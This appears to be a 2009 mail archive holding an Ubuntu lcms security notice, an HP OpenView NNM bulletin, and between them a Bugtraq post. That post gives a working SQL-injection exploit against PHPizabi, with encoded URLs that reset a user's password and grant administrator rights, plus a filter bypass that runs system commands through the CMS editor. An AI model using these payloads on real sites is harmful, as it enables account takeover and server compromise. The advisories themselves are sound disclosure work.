===========================================================
Ubuntu Security Notice USN-744-1 March 23, 2009
lcms vulnerabilities
CVE-2009-0581, CVE-2009-0723, CVE-2009-0733
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
liblcms1 1.13-1ubuntu0.2
Ubuntu 7.10:
liblcms1 1.16-5ubuntu3.2
python-liblcms 1.16-5ubuntu3.2
Ubuntu 8.04 LTS:
liblcms1 1.16-7ubuntu1.2
python-liblcms 1.16-7ubuntu1.2
Ubuntu 8.10:
liblcms1 1.16-10ubuntu0.2
python-liblcms 1.16-10ubuntu0.2
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
Chris Evans discovered that LittleCMS did not properly handle certain error
conditions, resulting in a large memory leak. If a user or automated system
were tricked into processing an image with malicious ICC tags, a remote
attacker could cause a denial of service. (CVE-2009-0581)
Chris Evans discovered that LittleCMS contained multiple integer overflows.
If a user or automated system were tricked into processing an image with
malicious ICC tags, a remote attacker could crash applications linked
against liblcms1, leading to a denial of service, or possibly execute
arbitrary code with user privileges. (CVE-2009-0723)
Chris Evans discovered that LittleCMS did not properly perform bounds
checking, leading to a buffer overflow. If a user or automated system were
tricked into processing an image with malicious ICC tags, a remote attacker
could execute arbitrary code with user privileges. (CVE-2009-0733)
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13-1ubuntu0.2.diff.gz
Size/MD5: 16399 ed8d931b572458a98ad21c867d5f2487
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13-1ubuntu0.2.dsc
Size/MD5: 647 a3baf912284c86827f6c3fb0dcac98ef
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13.orig.tar.gz
Size/MD5: 585735 e627f43bbbd238895502402d942a6cfd
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.2_amd64.deb
Size/MD5: 137660 29da157489a51641ae67d41b30be3ede
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.2_amd64.deb
Size/MD5: 129768 f4d40f5a5f5e1ab682b10f672f6b4854
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.2_amd64.deb
Size/MD5: 40502 a7cbcd2f32516ff4b5b9a852a4b9f70b
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.2_i386.deb
Size/MD5: 124334 03d7898a87db8d20e2605fdb12ba1106
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.2_i386.deb
Size/MD5: 118866 92d506d6462e2a1a8664171f9ea794c5
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.2_i386.deb
Size/MD5: 37308 70dfcdb72c41765ad6e2eeb28ad547f1
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.2_powerpc.deb
Size/MD5: 132024 f5353a5fe0ecfd5aa08a3b7f03c998d5
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.2_powerpc.deb
Size/MD5: 132484 c241cd5c31b808480852bcd888d7bf33
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.2_powerpc.deb
Size/MD5: 44362 492040ce637ad39508f0a23f8e70887b
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.2_sparc.deb
Size/MD5: 134932 e075347c7c6baca7ee5d3ae60f4c63f1
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.2_sparc.deb
Size/MD5: 125634 ea807c79db6752f9595f6eba6f2d0111
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.2_sparc.deb
Size/MD5: 38698 d0a84d8c4cf1a810a68a295f4639f1ea
Updated packages for Ubuntu 7.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16-5ubuntu3.2.diff.gz
Size/MD5: 25546 6d57bd85f90041967dd888a13c543c6b
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16-5ubuntu3.2.dsc
Size/MD5: 1015 e4d0440673a46a5bd817b9eceaecaecf
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16.orig.tar.gz
Size/MD5: 911546 b07b623f3e712373ff713fb32cf23651
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.2_amd64.deb
Size/MD5: 675488 388c442370fc7967bd286897c4f239d6
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.2_amd64.deb
Size/MD5: 105052 16ab9288c04e0b94a9a8738b47a97110
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.2_amd64.deb
Size/MD5: 58286 e73aa168732afdb0910ee116a6eef129
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.2_amd64.deb
Size/MD5: 161084 e4436b4fedf7b2a6191450784cca3d16
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.2_i386.deb
Size/MD5: 626656 f40f43aab6f5c0a1e1f7f7f495e54589
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.2_i386.deb
Size/MD5: 98788 b73751edf000dbf987ddb9df72d65bb1
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.2_i386.deb
Size/MD5: 54738 9b8bde7acdc4d5b1ff0a6b64e01f6d70
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.2_i386.deb
Size/MD5: 152060 5727b6b98955c53cecb3b25c8848e419
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.2_lpia.deb
Size/MD5: 628756 21ef105956daf49e251122f9bc9f1c6b
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.2_lpia.deb
Size/MD5: 97530 5be86a2f6d2307ccf0d93557132cc76b
http://ports.ubuntu.com/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.2_lpia.deb
Size/MD5: 55090 91144d0968cde6dd6c4c015f4f7d9627
http://ports.ubuntu.com/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.2_lpia.deb
Size/MD5: 148344 7117264c524024da8165a35e9e28a058
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.2_powerpc.deb
Size/MD5: 764002 ed174a8221d6465cdb29553ee885a72f
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.2_powerpc.deb
Size/MD5: 115248 7f73acafbfe531d4f0f9540b6dc7412f
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.2_powerpc.deb
Size/MD5: 71982 ad80e7128d1853c63971f413435f9a71
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.2_powerpc.deb
Size/MD5: 169926 d388443a572601382b2bfa06656e239a
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.2_sparc.deb
Size/MD5: 658642 0b9646029e86357185a8f9c4f091bc69
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.2_sparc.deb
Size/MD5: 100794 3b0522813ccc70f75fb4e9dec7fc4e9c
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.2_sparc.deb
Size/MD5: 58342 1339297fb81a7414b0df67fce4f0ee3a
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.2_sparc.deb
Size/MD5: 160214 06a65eb2ee41a155152efa32faabc3b5
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16-7ubuntu1.2.diff.gz
Size/MD5: 25728 059a45efcc1bae919504f7ec802efdd6
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16-7ubuntu1.2.dsc
Size/MD5: 1015 f6b20c88c9806747f5de29c02f9894b5
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16.orig.tar.gz
Size/MD5: 911546 b07b623f3e712373ff713fb32cf23651
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-7ubuntu1.2_amd64.deb
Size/MD5: 671500 c7dca7c05efcac13d42129f5b49fa885
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-7ubuntu1.2_amd64.deb
Size/MD5: 102618 93fef15514a704d2de1eaed4b252c115
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-7ubuntu1.2_amd64.deb
Size/MD5: 58628 88880fd38759ffe74bcf4d2c7a02bcc7
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-7ubuntu1.2_amd64.deb
Size/MD5: 160744 cfb18ac1863e146b46191c44e2dc6a5f
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-7ubuntu1.2_i386.deb
Size/MD5: 623060 9933b7312e23ffa180ff4c09aede9120
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-7ubuntu1.2_i386.deb
Size/MD5: 96198 3e217ba7f1f32576b7d02ae8bd4aadca
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-7ubuntu1.2_i386.deb
Size/MD5: 54934 d68dd91d1a1aee88b63c8340f4d01344
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-7ubuntu1.2_i386.deb
Size/MD5: 151784 776a7e1b5560fef837f23a5ace115002
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1-dev_1.16-7ubuntu1.2_lpia.deb
Size/MD5: 628870 774bd02c36c944c2dac2269a94cc0100
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1_1.16-7ubuntu1.2_lpia.deb
Size/MD5: 95566 ab3d60ec5641de6d0662e0219cd57e5a
http://ports.ubuntu.com/pool/universe/l/lcms/liblcms-utils_1.16-7ubuntu1.2_lpia.deb
Size/MD5: 55350 50e094f7ac8eedf5936e5c7ddef90e1c
http://ports.ubuntu.com/pool/universe/l/lcms/python-liblcms_1.16-7ubuntu1.2_lpia.deb
Size/MD5: 148450 217cbd4b8c02ff8df23c728373236d33
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1-dev_1.16-7ubuntu1.2_powerpc.deb
Size/MD5: 756288 55d0c64d4159f90858507748f22999e0
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1_1.16-7ubuntu1.2_powerpc.deb
Size/MD5: 111106 cbb834eea02a261ff95f91ae8b2831d3
http://ports.ubuntu.com/pool/universe/l/lcms/liblcms-utils_1.16-7ubuntu1.2_powerpc.deb
Size/MD5: 72152 409259595d3216ddeedde008b3cf1cf5
http://ports.ubuntu.com/pool/universe/l/lcms/python-liblcms_1.16-7ubuntu1.2_powerpc.deb
Size/MD5: 169264 a470e01317920a9e5a169f4250243a4d
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1-dev_1.16-7ubuntu1.2_sparc.deb
Size/MD5: 655476 09dd2eb67d0e13e2461db7cf00ae085c
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1_1.16-7ubuntu1.2_sparc.deb
Size/MD5: 98740 9fc94b2b933ca0e3a86af914b124ee58
http://ports.ubuntu.com/pool/universe/l/lcms/liblcms-utils_1.16-7ubuntu1.2_sparc.deb
Size/MD5: 57760 3cbc1e97417d5e121a4f626bd2f28654
http://ports.ubuntu.com/pool/universe/l/lcms/python-liblcms_1.16-7ubuntu1.2_sparc.deb
Size/MD5: 159758 f64230560e7cba2256388e0f91c25e00
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16-10ubuntu0.2.diff.gz
Size/MD5: 33307 b347c006de69915c5dab5bbd99aa82fa
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16-10ubuntu0.2.dsc
Size/MD5: 1354 572c5d2e2c22dbaef635368021b8a7c3
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16.orig.tar.gz
Size/MD5: 911546 b07b623f3e712373ff713fb32cf23651
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-10ubuntu0.2_amd64.deb
Size/MD5: 198456 d881445e1669f437f889fe6845ea55b8
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-10ubuntu0.2_amd64.deb
Size/MD5: 107286 9d55d0afc3c28443074e65465916ac45
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-10ubuntu0.2_amd64.deb
Size/MD5: 59438 f72f735da78cf9c678df511f5164236f
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-10ubuntu0.2_amd64.deb
Size/MD5: 158234 691c0c50bf7184e662b4fba0693f70d0
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-10ubuntu0.2_i386.deb
Size/MD5: 192370 a5d482eecd04afac2970757520dd47c1
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-10ubuntu0.2_i386.deb
Size/MD5: 100628 55e942db0d7beea1795285a98469fbe1
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-10ubuntu0.2_i386.deb
Size/MD5: 55308 2c788031380f52c237f514796446a75b
http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-10ubuntu0.2_i386.deb
Size/MD5: 150304 b99f9f88a6952c84ad54e39c3b2bb622
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1-dev_1.16-10ubuntu0.2_lpia.deb
Size/MD5: 188986 990370df3b90c3d51bc22c837f738b8b
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1_1.16-10ubuntu0.2_lpia.deb
Size/MD5: 99768 ab5ae2fac0345f04dac2cd41de8d5528
http://ports.ubuntu.com/pool/universe/l/lcms/liblcms-utils_1.16-10ubuntu0.2_lpia.deb
Size/MD5: 55666 da79498a812abdc927a21f660f271353
http://ports.ubuntu.com/pool/universe/l/lcms/python-liblcms_1.16-10ubuntu0.2_lpia.deb
Size/MD5: 145044 f79ee78633706be128a33f544396b26e
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1-dev_1.16-10ubuntu0.2_powerpc.deb
Size/MD5: 198206 bdbbcaf53c01e4c2241ae253b55af402
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1_1.16-10ubuntu0.2_powerpc.deb
Size/MD5: 113512 eda7c793d4b1f084986a6712a9ec63c2
http://ports.ubuntu.com/pool/universe/l/lcms/liblcms-utils_1.16-10ubuntu0.2_powerpc.deb
Size/MD5: 71934 b26d5a054f022131c138b5a68fa841f5
http://ports.ubuntu.com/pool/universe/l/lcms/python-liblcms_1.16-10ubuntu0.2_powerpc.deb
Size/MD5: 165790 357084a7ac7fb3fd61bd5cb23a407e35
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1-dev_1.16-10ubuntu0.2_sparc.deb
Size/MD5: 195826 9232d7265dc65c88420985ee565d02a6
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1_1.16-10ubuntu0.2_sparc.deb
Size/MD5: 101024 64c774ed7d767b8d24e07fd19aa1ad24
http://ports.ubuntu.com/pool/universe/l/lcms/liblcms-utils_1.16-10ubuntu0.2_sparc.deb
Size/MD5: 61116 c60bbdcb8ff337b9f9ef9750ff1acfab
http://ports.ubuntu.com/pool/universe/l/lcms/python-liblcms_1.16-10ubuntu0.2_sparc.deb
Size/MD5: 158180 268ea56e1620676c9e4bf866814fb99e
--=-XLbzR5VdoiL1MffJGUo7
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAknH1yAACgkQLMAs/0C4zNpIxACeO1802hK4hTn9k965alsde3IY
0egAoJuubDrgvLWB+sBiahlcGfA1Y3/r
=lK+o
-----END PGP SIGNATURE-----
--=-XLbzR5VdoiL1MffJGUo7--
From - Tue Mar 24 12:02:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006c2b
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39826-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 4E278ED626
for <lists@securityspace.com>; Tue, 24 Mar 2009 11:56:10 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4EAFC23711F; Tue, 24 Mar 2009 08:11:16 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24320 invoked from network); 24 Mar 2009 07:04:07 -0000
Date: Tue, 24 Mar 2009 01:04:28 -0600
Message-Id: <200903240704.n2O74SRN010098@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: nospam@gmail.it
To: bugtraq@securityfocus.com
Subject: PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation
(php.ini independent)
Status:
--------------------------------------------------------------------------------
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo
--------------------------------------------------------------------------------
our site:
http://retrogod.altervista.org/
software site:
http://www.phpizabi.net/
--------------------------------------------------------------------------------
vulnerability:
sql injection in /theme/default/proc.inc.php
<?php
function bufferProcParse($buffer) {
global $CONF;
$tpl = new template;
$tpl -> LoadThis($buffer);
// HANDLE POSTED NOTEPAD DATA ///////////////////////////////////////////////////////
if (isset($_GET["notepad_body"])) {
myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
me("flush");
}
..
note urldecode() ...
exploitation, manual:
injection urls:
change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%
2527/*
grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%
20%2527bookoo%2527/*
navigate:
http://host/path_to_phpizabi/?L�min.index
boom !
now go to:
http://host/path_to_phpizabi/?L�min.cms.edit&id={cms.file}
use this opening and closing tag style, example:
<script language="php">
system("ls -la");
</script>
(it is always availiable, see:
http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php :
..
if (isset($_POST["Submit"])) {
if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {
$body "<?php if (!defined(\"CORE_STRAP\")) die(); ?>\n"
.preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0]))
."\n<!-- Edited by ".me("username")." on ".date($CONF["LOCALE_HEADER_DATE_TIME"])." -->";
;
fwrite($handle, $body);
fclose($handle);
..
which is bypassed.
save changes and navigate:
http://host/path_to_phpizabi/?L=cms._cms_file_
to see the output...
now visit log page:
http://192.168.0.1/phpizabi/?L�min.logs.logs
..
--------------------------------------------------------------------------------
original url:
http://retrogod.altervista.org/9sg_phpizabi_848bc1.html
From - Tue Mar 24 12:12:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006c2c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39827-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 24841ED630
for <lists@securityspace.com>; Tue, 24 Mar 2009 12:11:55 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B784D237213; Tue, 24 Mar 2009 08:11:45 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28717 invoked from network); 24 Mar 2009 12:34:49 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02416 SSRT090008 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code
Date: Tue, 24 Mar 2009 05:36:54 -0700
Sender: secure@hpchs.cup.hp.com
Message-Id: <20090324123655.54399BF86@hpchs.cup.hp.com>
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01696729
Version: 1
HPSBMA02416 SSRT090008 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-03-23
Last Updated: 2009-03-23
Potential Security Impact: Remote execution of arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code.
References: CVE-2009-0920, CVE-2009-0921
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, Solaris, and Windows
BACKGROUND
CVSS 2.0 Base Metrics
==============================================Reference Base Vector Base Score
CVE-2009-0920 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2009-0921 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
==============================================Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
The Hewlett-Packard Company thanks Oren Isacson of Core Security Technologies for reporting these vulnerabilities to security-alert@hp.com.
RESOLUTION
HP has made archive files available to resolve the vulnerabilities. The archive files are listed in the tables below. The tables also list required patches. The patches will insure that NNM is compatible with the software files in the archive.
The patches are available from
http://support.openview.hp.com/selfsolve/patches
Note: The patches are not available from the HP IT Resource Center (ITRC).
The archive files are available from:
ftp://ss090008:ss090008@hprc.external.hp.com/
To install the archive files:
1. Install the required patch listed below
2. Uncompress the archive (SSRT090008.QCCR1B26779.hotfix.tar.gz)
3. Unpack the archive (SSRT090008.QCCR1B26779.hotfix.tar)
4. ovstop -c
5. Follow the instructions in the README.txt file
6. ovstart -c
OV NNM v7.53
Operating System
Required Patch
Archive File
Archive File MD5 Sum
HP-UX (IA)
PHSS_38783 or subsequent
SSRT090008.QCCR1B26779.hotfix.tar
36f576b62383405841cc88f85292888a
HP-UX (PA)
PHSS_38782 or subsequent
SSRT090008.QCCR1B26779.hotfix.tar
36f576b62383405841cc88f85292888a
Linux RedHatAS2.1
LXOV_00089 or subsequent
SSRT090008.QCCR1B26779.hotfix.tar
36f576b62383405841cc88f85292888a
Linux RedHat4AS-x86_64
LXOV_00090 or subsequent
SSRT090008.QCCR1B26779.hotfix.tar
36f576b62383405841cc88f85292888a
Solaris
PSOV_03517 or subsequent
SSRT090008.QCCR1B26779.hotfix.tar
36f576b62383405841cc88f85292888a
Windows
NNM_01195 or subsequent
SSRT090008.QCCR1B26779.hotfix.tar
36f576b62383405841cc88f85292888a
OV NNM v7.51
Upgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above. Patch bundles for upgrading from NNM v7.51 to NNM v7.53 are available here:
ftp://nnm_753:update@hprc.external.hp.com/
OV NNM v7.01
Operating System
Required Patch
Archive File
Archive File MD5 Sum
HP-UX (PA)
PHSS_38761 or subsequent
SSRT090008.QCCR1B26779.hotfix.tar
36f576b62383405841cc88f85292888a
Solaris
PSOV_03516 or subsequent
SSRT090008.QCCR1B26779.hotfix.tar
36f576b62383405841cc88f85292888a
Windows
NNM_01194 or subsequent
SSRT090008.QCCR1B26779.hotfix.tar
36f576b62383405841cc88f85292888a
MANUAL ACTIONS: Yes - NonUpdate
Apply the appropriate archive as described in the Resolution.
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS (for HP-UX)
For HP-UX OV NNM 7.51 and 7.53
HP-UX B.11.31
HP-UX B.11.23 (IA)
HP-UX B.11.23 (PA)
HP-UX B.11.11
============OVNNMgr.OVNNM-RUN,fr=B.07.50.00
action: install the patches and archive files listed in the Resolution
URL:
ftp://ss090008:ss090008@hprc.external.hp.com/
For HP-UX OV NNM 7.01
HP-UX B.11.11
============OVNNMgr.OVNNM-RUN,fr=B.07.01.00
action: install the patches and archive files listed in the Resolution
URL:
ftp://ss090008:ss090008@hprc.external.hp.com/
END AFFECTED VERSIONS (for HP-UX)
HISTORY
Version:1 (rev.1) - 23 March 2009 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
